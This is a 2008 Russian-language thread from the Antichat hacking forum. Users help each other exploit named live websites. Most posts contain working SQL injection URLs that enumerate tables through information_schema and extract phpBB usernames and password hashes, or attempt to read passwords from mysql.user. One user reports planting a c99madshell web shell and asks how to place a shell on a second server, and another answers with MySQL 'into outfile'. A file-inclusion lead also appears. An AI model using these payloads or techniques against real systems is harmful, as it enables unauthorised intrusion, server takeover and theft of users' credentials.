ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.06.2008, 12:07
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
doesn't exist - не существует
Как действовать в этом случае?
Подбирай таблицу. С суфиксами пробуй.
Последний раз редактировалось .Begemot.; 16.06.2008 в 12:10..
|
|
|
16.06.2008, 12:39
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, 
Последний раз редактировалось Ershik; 16.06.2008 в 12:42..
|
|
|
|
16.06.2008, 13:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Ershik
Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name
|
|
|
|
16.06.2008, 19:31
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
PHP код:
union+select+1,2,concat_ws(0x3a,table_name,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/*
Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas"
Red sps.  |
|
|
|
16.06.2008, 21:55
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от Ershik
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
собственно вот запрос:
Код:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/*
так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
|
|
|
|
17.06.2008, 18:46
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Здравствуйте! 
Залил c99madshell на сервер 1.
Есть доступ admin через c99madshell в MySQL базы сервера 2.
Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера?
Спасибо! |
|
|
|
17.06.2008, 19:21
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от fervex
Здравствуйте!
Залил c99madshell на сервер 1.
Есть доступ admin через c99madshell в MySQL базы сервера 2.
Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера?
Спасибо! Стандартно, через into outfile
__________________
|
|
|
|
18.06.2008, 01:34
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ =&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f 15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите
|
|
|
|
18.06.2008, 03:19
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от diznt
http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ =&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f 15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите
эм... а чем помогать то? это вроде как не скул инж... там в параметре area передается адрес к файлу:
Код:
http://darkbrotherhood.ru/index.php?area=1asd&p=static&page=offres
попробуй это заюзать, может получится...
Последний раз редактировалось gisTy; 18.06.2008 в 05:11..
|
|
|
|
18.06.2008, 04:35
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Foxtrot1
http://darkbrotherhood.ru/index.php?area=1+union+select+aes_decrypt(aes_encr ypt((version(),0x71),0x71),2,3,4,5,6/*
mysql 4 or 5.
http://darkbrotherhood.ru/index.php?area=1+union+select+password,2,3,4,5,6+f rom+mysql.user/*
у юзера нет прав.
Table 'wwwdarkbrotherhoodru_mysql.users' doesn't exist
переберай колонки.)
Последний раз редактировалось sabe; 18.06.2008 в 05:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
